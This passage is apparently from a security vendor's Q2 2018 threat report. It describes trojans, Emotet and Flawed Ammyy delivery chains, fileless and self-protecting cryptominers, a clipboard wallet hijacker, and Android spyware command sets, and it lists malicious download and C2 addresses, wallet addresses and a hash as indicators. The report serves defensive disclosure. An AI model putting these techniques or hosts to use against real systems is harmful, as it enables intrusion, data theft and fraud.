- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 7 of 73
21 The Most Widespread Trojan The most proliferated trojan TrojWareWin32Injector is designed to steal credentials from infected computers It was spread via fake email imitating a message from a shipping and trading company As seen in the screenshot the malware attached is carefully disguised with a plausible name and icon to look like a real scanned document
If a user takes the bait and runs the file it copies itself to appdata as D5E2DEE36C7Aexe then launches itself from that location and starts to gather credentials present in the system
It collects credentials and private data from known browsers email clients FTP clients WebDav SCP clients Then it sends all the collected data to the attackersrsquo server httpcallbedmlpackfarefrephp
The phishing email
Global Threat Report Q2 2018 Edition
Page 8 of 73
22 PowerShell-based attack with Emotet Another alarming trend is related to malware itself rather than its delivery method Often cybercriminals use malware based not on Windows native exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer This type of attack is much harder to detect with antivirus tools
Emotet is one of the most aggressive trojans currently acting in cyberspace Spread by various infection vectors and backed by a huge network of compromised hosts it heavily affects many individuals and companies
The following attack started with the email that imitated a message from IRS about ldquoTax Account Transcriptrdquo Notice the message is written in a cheerful manner to inspire user trust
The phishing email
Global Threat Report Q2 2018 Edition
Page 9 of 73
The attached file is an Office document containing a VBScript As the settings of the newly installed Microsoft Office do not allow execution of such scripts by default the attackers added a special option to convince the victims to turn on VBScript execution
The special option to convince the victims to turn on VBScript execution
Global Threat Report Q2 2018 Edition
Page 10 of 73
The purpose of the VBScript is to launch PowerShell
Global Threat Report Q2 2018 Edition
Page 11 of 73
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of the writing only thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb)
The binary moves itself to CWindowsSysWOW64lanesviewerexe and creates a service ldquolanesviewerrdquo to ensure persistence
The malware creates ldquolanesviewerrdquo service to ensure persistence
Global Threat Report Q2 2018 Edition
Page 12 of 73
And after that Emotet begins it real mission ndash stealing private data from the compromised system which it then it sends to the cybercriminals Command amp Control server
The next example is even more cunning because it infects computers with popular legitimate Microsoft software
23 Flawed Ammyy RAT attack based on legitimate software Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks What is most impressive is that it is based on a legitimate software called Ammyy Admin Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company It provides an easy way to establish a reliable remote desktop connection connecting remote computers within seconds without additional installation or configuration work
The dark side of this tool is that its features ideally suit the purposes of cybercriminal Unsurprisingly perpetrators tried to adopt it for their malicious activity Cybercriminals repeatedly compromised the Ammyyy Group website and replaced original Ammyy Admin software with a bundle containing malware Thus every user who downloaded Ammyy Admin became covertly infected Ammy Group cleaned up the compromised website but the attackers infected it again and this vicious сycle continued endlessly
Global Threat Report Q2 2018 Edition
Page 13 of 73
As you can see on the diagram Ammy Admin was used in spreading many types of nefarious malware
The newest version of malicious modification of Ammyy Admin is called Flawed Ammyy Itrsquos a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 It got its name from the leaked source code of the third Ammyy Admin version Flawed Ammyy RAT let the attackers use functions such as Remote Desktop control File System Manager proxy support and audio chat Cybercriminals take total control of the infected host and can run amok ndash steal credentials and documents remove or add files run applications install other malware etc
The way Flaw Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users What is especially worth noticing is the fact that these tricks are also based on using a legitimate software ndash Microsoft this time
Global Threat Report Q2 2018 Edition
Page 14 of 73
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel
The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell
Malware runs PowerShell
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
